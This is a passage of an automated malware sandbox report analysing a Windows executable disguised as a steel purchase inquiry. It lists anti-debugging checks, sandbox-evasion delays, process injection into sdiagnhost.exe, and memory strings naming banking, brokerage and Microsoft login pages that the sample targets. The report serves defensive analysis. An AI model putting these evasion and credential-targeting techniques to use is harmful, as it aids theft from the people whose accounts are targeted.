Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00AB8699 push esi; ret		0_2_00AB8682
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00AB8691 push esi; ret		0_2_00AB8682
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00AB8629 push esi; ret		0_2_00AB8682
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E7225F pushad ; ret		0_2_00E727F9
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E727FA pushad ; ret		0_2_00E727F9
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E7283D push eax; iretd		0_2_00E72858
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA09AD push ecx; mov dword ptr [esp], ecx		0_2_00EA09B6
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E71368 push eax; iretd		0_2_00E71369
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Code function: 9_2_050E6DDA push es; ret		9_2_050E6DDB
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Code function: 9_2_050F1C1A push esi; ret		9_2_050F1C03
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Code function: 9_2_050F1C12 push esi; ret		9_2_050F1C03
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Code function: 9_2_050DE7A4 push ebp; iretd		9_2_050DE7B6
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Code function: 9_2_050EFEC2 push ss; iretd		9_2_050EFED5
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Code function: 9_2_050EC03A push ebp; iretd		9_2_050EC03B
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Code function: 9_2_050E6B63 push esi; iretd		9_2_050E6B15
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Code function: 9_2_050F1BAA push esi; ret		9_2_050F1C03
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Code function: 9_2_050E6A40 push ds; ret		9_2_050E6A46
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Code function: 9_2_050E6A86 push esi; iretd		9_2_050E6B15
Source: C:\Program Files (x86)\YwalPDbopbvRLoyxMkeZyluBIPkXWetvCAwmZkDXNTuuMDPQhwgKcLbLfEaaKMoYSgXkL\1h36yydaHEcruJ.exe	Code function: 9_2_050E6AFC push esi; iretd		9_2_050E6B15
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Code function: 10_2_04CB09AD push ecx; mov dword ptr [esp], ecx		10_2_04CB09B6

Source: INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe

Static PE information: section name: .text entropy: 7.994668446002786

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\sdiagnhost.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\SysWOW64\sdiagnhost.exe	API/Special instruction interceptor: Address: 7FFC1B60D324
Source: C:\Windows\SysWOW64\sdiagnhost.exe	API/Special instruction interceptor: Address: 7FFC1B60D7E4
Source: C:\Windows\SysWOW64\sdiagnhost.exe	API/Special instruction interceptor: Address: 7FFC1B60D944
Source: C:\Windows\SysWOW64\sdiagnhost.exe	API/Special instruction interceptor: Address: 7FFC1B60D504
Source: C:\Windows\SysWOW64\sdiagnhost.exe	API/Special instruction interceptor: Address: 7FFC1B60D544
Source: C:\Windows\SysWOW64\sdiagnhost.exe	API/Special instruction interceptor: Address: 7FFC1B60D1E4
Source: C:\Windows\SysWOW64\sdiagnhost.exe	API/Special instruction interceptor: Address: 7FFC1B610154
Source: C:\Windows\SysWOW64\sdiagnhost.exe	API/Special instruction interceptor: Address: 7FFC1B60DA44

Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe

Code function: 0_2_00EE096E rdtsc

0_2_00EE096E

Source: C:\Windows\SysWOW64\sdiagnhost.exe	Window / User API: threadDelayed 3919			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Window / User API: threadDelayed 6053			Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\sdiagnhost.exe	API coverage: 2.7 %

Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 6456	Thread sleep count: 3919 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 6456	Thread sleep time: -7838000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 6456	Thread sleep count: 6053 > 30			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe TID: 6456	Thread sleep time: -12106000s >= -30000s			Jump to behavior

Source: C:\Windows\SysWOW64\sdiagnhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\sdiagnhost.exe

Code function: 10_2_02CBCD40 FindFirstFileW,FindNextFileW,FindClose,

10_2_02CBCD40

Source: sdiagnhost.exe, 0000000A.00000002.2115608834.0000000007D94000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware20,11696492231n
Source: 8m89j3K6.10.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
Source: 8m89j3K6.10.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
Source: 8m89j3K6.10.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
Source: 8m89j3K6.10.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
Source: 8m89j3K6.10.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
Source: sdiagnhost.exe, 0000000A.00000002.2115608834.0000000007D94000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMware20,11696492231t
Source: 8m89j3K6.10.dr	Binary or memory string: outlook.office.comVMware20,11696492231s
Source: 8m89j3K6.10.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
Source: 8m89j3K6.10.dr	Binary or memory string: AMC password management pageVMware20,11696492231
Source: 8m89j3K6.10.dr	Binary or memory string: interactivebrokers.comVMware20,11696492231
Source: 8m89j3K6.10.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
Source: sdiagnhost.exe, 0000000A.00000002.2115608834.0000000007D94000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ist test formVMware20,11696492231
Source: 8m89j3K6.10.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
Source: sdiagnhost.exe, 0000000A.00000002.2115608834.0000000007D94000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: alstudio.comVMware20,11696492231<
Source: 8m89j3K6.10.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
Source: 8m89j3K6.10.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
Source: 8m89j3K6.10.dr	Binary or memory string: outlook.office365.comVMware20,11696492231t
Source: sdiagnhost.exe, 0000000A.00000002.2115608834.0000000007D94000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tion PasswordVMware20,1169649223|
Source: sdiagnhost.exe, 0000000A.00000002.2115608834.0000000007D94000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: .co.inVMware20,11696492231d
Source: 8m89j3K6.10.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
Source: sdiagnhost.exe, 0000000A.00000002.2115608834.0000000007D94000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,116
Source: 8m89j3K6.10.dr	Binary or memory string: discord.comVMware20,11696492231f
Source: sdiagnhost.exe, 0000000A.00000002.2111184637.0000000002F56000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000000C.00000002.1653164876.000001FD27F8C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 8m89j3K6.10.dr	Binary or memory string: global block list test formVMware20,11696492231
Source: 8m89j3K6.10.dr	Binary or memory string: dev.azure.comVMware20,11696492231j
Source: 8m89j3K6.10.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
Source: 8m89j3K6.10.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
Source: 8m89j3K6.10.dr	Binary or memory string: bankofamerica.comVMware20,11696492231x
Source: 8m89j3K6.10.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
Source: 8m89j3K6.10.dr	Binary or memory string: tasks.office.comVMware20,11696492231o
Source: 8m89j3K6.10.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
Source: 8m89j3K6.10.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
Source: 8m89j3K6.10.dr	Binary or memory string: ms.portal.azure.comVMware20,11696492231
Source: 8m89j3K6.10.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
Source: 1h36yydaHEcruJ.exe, 0000000B.00000002.2113243777.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
Source: 8m89j3K6.10.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
Source: 8m89j3K6.10.dr	Binary or memory string: turbotax.intuit.comVMware20,11696492231t
Source: 8m89j3K6.10.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
Source: 8m89j3K6.10.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696492231]

Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\sdiagnhost.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe

Code function: 0_2_00EE096E rdtsc

0_2_00EE096E

Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe

Code function: 0_2_00AB80B3 LdrLoadDll,

0_2_00AB80B3

Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA80E9 mov eax, dword ptr fs:[00000030h]		0_2_00EA80E9
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E9A0E3 mov ecx, dword ptr fs:[00000030h]		0_2_00E9A0E3
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F260E0 mov eax, dword ptr fs:[00000030h]		0_2_00F260E0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E9C0F0 mov eax, dword ptr fs:[00000030h]		0_2_00E9C0F0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE20F0 mov ecx, dword ptr fs:[00000030h]		0_2_00EE20F0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F220DE mov eax, dword ptr fs:[00000030h]		0_2_00F220DE
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E980A0 mov eax, dword ptr fs:[00000030h]		0_2_00E980A0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F660B8 mov eax, dword ptr fs:[00000030h]		0_2_00F660B8
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F660B8 mov ecx, dword ptr fs:[00000030h]		0_2_00F660B8
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F380A8 mov eax, dword ptr fs:[00000030h]		0_2_00F380A8
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA208A mov eax, dword ptr fs:[00000030h]		0_2_00EA208A
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ECC073 mov eax, dword ptr fs:[00000030h]		0_2_00ECC073
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F26050 mov eax, dword ptr fs:[00000030h]		0_2_00F26050
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA2050 mov eax, dword ptr fs:[00000030h]		0_2_00EA2050
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F36030 mov eax, dword ptr fs:[00000030h]		0_2_00F36030
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E9A020 mov eax, dword ptr fs:[00000030h]		0_2_00E9A020
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E9C020 mov eax, dword ptr fs:[00000030h]		0_2_00E9C020
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F24000 mov ecx, dword ptr fs:[00000030h]		0_2_00F24000
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F42000 mov eax, dword ptr fs:[00000030h]		0_2_00F42000
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F42000 mov eax, dword ptr fs:[00000030h]		0_2_00F42000
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F42000 mov eax, dword ptr fs:[00000030h]		0_2_00F42000
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F42000 mov eax, dword ptr fs:[00000030h]		0_2_00F42000
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F42000 mov eax, dword ptr fs:[00000030h]		0_2_00F42000
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F42000 mov eax, dword ptr fs:[00000030h]		0_2_00F42000
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F42000 mov eax, dword ptr fs:[00000030h]		0_2_00F42000
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F42000 mov eax, dword ptr fs:[00000030h]		0_2_00F42000
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EBE016 mov eax, dword ptr fs:[00000030h]		0_2_00EBE016
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EBE016 mov eax, dword ptr fs:[00000030h]		0_2_00EBE016
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EBE016 mov eax, dword ptr fs:[00000030h]		0_2_00EBE016
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EBE016 mov eax, dword ptr fs:[00000030h]		0_2_00EBE016
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F761E5 mov eax, dword ptr fs:[00000030h]		0_2_00F761E5
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED01F8 mov eax, dword ptr fs:[00000030h]		0_2_00ED01F8
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F1E1D0 mov eax, dword ptr fs:[00000030h]		0_2_00F1E1D0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F1E1D0 mov eax, dword ptr fs:[00000030h]		0_2_00F1E1D0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F1E1D0 mov ecx, dword ptr fs:[00000030h]		0_2_00F1E1D0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F1E1D0 mov eax, dword ptr fs:[00000030h]		0_2_00F1E1D0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F1E1D0 mov eax, dword ptr fs:[00000030h]		0_2_00F1E1D0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F661C3 mov eax, dword ptr fs:[00000030h]		0_2_00F661C3
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F661C3 mov eax, dword ptr fs:[00000030h]		0_2_00F661C3
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EE0185 mov eax, dword ptr fs:[00000030h]		0_2_00EE0185
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F2019F mov eax, dword ptr fs:[00000030h]		0_2_00F2019F
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F2019F mov eax, dword ptr fs:[00000030h]		0_2_00F2019F
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F2019F mov eax, dword ptr fs:[00000030h]		0_2_00F2019F
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F2019F mov eax, dword ptr fs:[00000030h]		0_2_00F2019F
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F44180 mov eax, dword ptr fs:[00000030h]		0_2_00F44180
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F44180 mov eax, dword ptr fs:[00000030h]		0_2_00F44180
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F5C188 mov eax, dword ptr fs:[00000030h]		0_2_00F5C188
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F5C188 mov eax, dword ptr fs:[00000030h]		0_2_00F5C188
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E9A197 mov eax, dword ptr fs:[00000030h]		0_2_00E9A197
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E9A197 mov eax, dword ptr fs:[00000030h]		0_2_00E9A197
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E9A197 mov eax, dword ptr fs:[00000030h]		0_2_00E9A197
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F74164 mov eax, dword ptr fs:[00000030h]		0_2_00F74164
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F74164 mov eax, dword ptr fs:[00000030h]		0_2_00F74164
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F38158 mov eax, dword ptr fs:[00000030h]		0_2_00F38158
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F34144 mov eax, dword ptr fs:[00000030h]		0_2_00F34144
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F34144 mov eax, dword ptr fs:[00000030h]		0_2_00F34144
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F34144 mov ecx, dword ptr fs:[00000030h]		0_2_00F34144
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F34144 mov eax, dword ptr fs:[00000030h]		0_2_00F34144
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F34144 mov eax, dword ptr fs:[00000030h]		0_2_00F34144
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA6154 mov eax, dword ptr fs:[00000030h]		0_2_00EA6154
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EA6154 mov eax, dword ptr fs:[00000030h]		0_2_00EA6154
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00E9C156 mov eax, dword ptr fs:[00000030h]		0_2_00E9C156
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00ED0124 mov eax, dword ptr fs:[00000030h]		0_2_00ED0124
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F60115 mov eax, dword ptr fs:[00000030h]		0_2_00F60115
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F4A118 mov ecx, dword ptr fs:[00000030h]		0_2_00F4A118
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F4A118 mov eax, dword ptr fs:[00000030h]		0_2_00F4A118
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F4A118 mov eax, dword ptr fs:[00000030h]		0_2_00F4A118
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F4A118 mov eax, dword ptr fs:[00000030h]		0_2_00F4A118
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F4E10E mov eax, dword ptr fs:[00000030h]		0_2_00F4E10E
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F4E10E mov ecx, dword ptr fs:[00000030h]		0_2_00F4E10E
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F4E10E mov eax, dword ptr fs:[00000030h]		0_2_00F4E10E
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F4E10E mov eax, dword ptr fs:[00000030h]		0_2_00F4E10E
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F4E10E mov ecx, dword ptr fs:[00000030h]		0_2_00F4E10E
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F4E10E mov eax, dword ptr fs:[00000030h]		0_2_00F4E10E
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F4E10E mov eax, dword ptr fs:[00000030h]		0_2_00F4E10E
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F4E10E mov ecx, dword ptr fs:[00000030h]		0_2_00F4E10E
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F4E10E mov eax, dword ptr fs:[00000030h]		0_2_00F4E10E
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F4E10E mov ecx, dword ptr fs:[00000030h]		0_2_00F4E10E
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB02E1 mov eax, dword ptr fs:[00000030h]		0_2_00EB02E1
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB02E1 mov eax, dword ptr fs:[00000030h]		0_2_00EB02E1
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB02E1 mov eax, dword ptr fs:[00000030h]		0_2_00EB02E1
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F762D6 mov eax, dword ptr fs:[00000030h]		0_2_00F762D6
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB02A0 mov eax, dword ptr fs:[00000030h]		0_2_00EB02A0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00EB02A0 mov eax, dword ptr fs:[00000030h]		0_2_00EB02A0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F362A0 mov eax, dword ptr fs:[00000030h]		0_2_00F362A0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F362A0 mov ecx, dword ptr fs:[00000030h]		0_2_00F362A0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F362A0 mov eax, dword ptr fs:[00000030h]		0_2_00F362A0
Source: C:\Users\user\Desktop\INQUIRY 032925 (ASTM A572,AISISAE 4130,AISI 304).exe	Code function: 0_2_00F362A0 mov eax, dword ptr fs:[00000030h]		0_2_00F362A0
